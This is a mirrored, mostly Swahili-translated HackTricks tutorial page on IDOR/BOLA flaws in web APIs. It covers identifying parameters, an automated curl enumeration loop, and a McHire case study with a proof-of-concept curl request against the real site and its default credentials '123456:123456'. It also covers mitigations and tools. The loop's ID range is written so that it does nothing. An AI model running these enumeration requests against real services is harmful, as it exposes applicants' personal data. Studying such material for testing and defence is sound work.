maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/pentesting-web/idor.md

86 lines
4.4 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# IDOR (Insecure Direct Object Reference)
{{#include ../banners/hacktricks-training.md}}
IDOR (Insecure Direct Object Reference) / Broken Object Level Authorization (BOLA) inajitokeza wakati mwisho wa wavuti au API unatoa au unakubali kitambulisho kinachoweza kudhibitiwa na mtumiaji ambacho kinatumika **moja kwa moja** kufikia kitu cha ndani **bila kuthibitisha kwamba mpiga simu anaidhinishwa** kufikia/kubadilisha kitu hicho. Utekelezaji wa mafanikio kawaida unaruhusu kupanda kwa haki za usawa au wima kama kusoma au kubadilisha data za watumiaji wengine na, katika hali mbaya, kuchukua akaunti kamili au kuhamasisha data kwa wingi.
---
## 1. Kutambua IDOR zinazoweza kutokea
1. Tafuta **parameta zinazorejelea kitu**:
* Njia: `/api/user/1234`, `/files/550e8400-e29b-41d4-a716-446655440000`
* Swali: `?id=42`, `?invoice=2024-00001`
* Mwili / JSON: `{"user_id": 321, "order_id": 987}`
* Vichwa / Cookies: `X-Client-ID: 4711`
2. Prefer mwisho ambao **unasoma au kubadilisha** data (`GET`, `PUT`, `PATCH`, `DELETE`).
3. Kumbuka wakati vitambulisho ni **mfuatano au vinavyoweza kutabiriwa** ikiwa ID yako ni `64185742`, basi `64185741` huenda ipo.
4. Chunguza njia zilizofichwa au mbadala (mfano *"Paradox team members"* kiungo kwenye kurasa za kuingia) ambazo zinaweza kufichua APIs za ziada.
5. Tumia **sehemu ya kuthibitishwa ya chini ya haki** na badilisha tu ID **ukihifadhi token/cookie ile ile**. Kukosekana kwa kosa la uthibitisho kawaida ni ishara ya IDOR.
### Quick manual tampering (Burp Repeater)
```
PUT /api/lead/cem-xhr HTTP/1.1
Host: www.example.com
Cookie: auth=eyJhbGciOiJIUzI1NiJ9...
Content-Type: application/json
{"lead_id":64185741}
```
### Uainishaji wa otomatiki (Burp Intruder / curl loop)
```bash
for id in $(seq 64185742 64185700); do
curl -s -X PUT 'https://www.example.com/api/lead/cem-xhr' \
-H 'Content-Type: application/json' \
-H "Cookie: auth=$TOKEN" \
-d '{"lead_id":'"$id"'}' | jq -e '.email' && echo "Hit $id";
done
```
---
## 2. Utafiti wa Kesi Halisi Jukwaa la Chatbot la McHire (2025)
Wakati wa tathmini ya lango la ajira la **McHire** lililofanywa na Paradox.ai, IDOR ifuatayo iligundulika:
* Endpoint: `PUT /api/lead/cem-xhr`
* Authorization: cookie ya kikao cha mtumiaji kwa akaunti ya mtihani ya **yoyote** ya mgahawa
* Body parameter: `{"lead_id": N}` kitambulisho cha nambari **za mpangilio** za tarakimu 8
Kwa kupunguza `lead_id`, mtathmini alirejesha taarifa za waombaji **kamili za PII** (jina, barua pepe, simu, anwani, mapendeleo ya zamu) pamoja na **JWT** ya mtumiaji ambayo iliruhusu kuiba kikao. Uhesabuji wa anuwai `1 64,185,742` ulifunua takriban **milioni 64** za rekodi.
Ombi la Ushahidi wa Dhihirisho:
```bash
curl -X PUT 'https://www.mchire.com/api/lead/cem-xhr' \
-H 'Content-Type: application/json' \
-d '{"lead_id":64185741}'
```
Combined with **default admin credentials** (`123456:123456`) that granted access to the test account, the vulnerability resulted in a critical, company-wide data breach.
---
## 3. Athari za IDOR / BOLA
* Kupanua kwa usawa soma/update/futa data za **watumiaji wengine**.
* Kupanua kwa wima mtumiaji mwenye mamlaka ya chini anapata kazi za kiutawala pekee.
* Uvunjaji wa data kwa wingi ikiwa vitambulisho ni vya mfululizo (mfano, vitambulisho vya waombaji, ankara).
* Kuchukua akaunti kwa kuiba tokeni au kuweka upya nywila za watumiaji wengine.
---
## 4. Njia za Kupunguza & Mbinu Bora
1. **Tekeleza ruhusa ya kiwango cha kitu** kwenye kila ombi (`user_id == session.user`).
2. Prefer **vitambulisho visivyoweza kudhaniwa** (UUIDv4, ULID) badala ya vitambulisho vya kuongezeka kiotomatiki.
3. Fanya ruhusa **seva upande**, usitegemee maeneo ya siri ya fomu au udhibiti wa UI.
4. Tekeleza **RBAC / ABAC** ukaguzi katika middleware kuu.
5. Ongeza **kikomo cha kiwango & ufuatiliaji** kugundua kuhesabu vitambulisho.
6. Jaribu usalama kila mwisho mpya (kitengo, muunganiko, na DAST).
---
## 5. Zana
* **BurpSuite extensions**: Authorize, Auto Repeater, Turbo Intruder.
* **OWASP ZAP**: Auth Matrix, Forced Browse.
* **Github projects**: `bwapp-idor-scanner`, `Blindy` (uwindaji wa IDOR kwa wingi).
## Marejeleo
* [McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicants PII](https://ian.sh/mcdonalds)
* [OWASP Top 10 Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)
* [How to Find More IDORs Vickie Li](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)
{{#include ../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink